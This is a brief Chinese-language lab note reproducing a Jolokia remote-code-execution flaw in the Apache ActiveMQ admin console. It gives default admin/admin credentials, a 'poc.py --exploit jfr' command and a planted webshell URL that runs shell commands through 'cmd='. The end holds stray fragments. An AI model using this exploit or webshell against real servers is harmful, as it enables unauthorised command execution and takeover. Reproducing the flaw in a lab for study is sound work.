Apache ActiveMQ Jolokia 后臺遠程代碼執行漏洞
Apache ActiveMQ在5.16.5,5.17.3版本及以前,后臺Jolokia存在一處任意文件寫入導致的遠程代碼執行漏洞。
啟動環境
admin/admin
方法一:利用poc
這個方法受到ActiveMQ版本的限制,因為Log4j2是在5.17.0中才引入Apache ActiveMQ
方法二:
python poc.py -u admin -p admin --exploit jfr http://localhost:8161
http://192.168.62.131:8161/admin/shelljfr.jsp?cmd=id
)
)
)
Develop Team)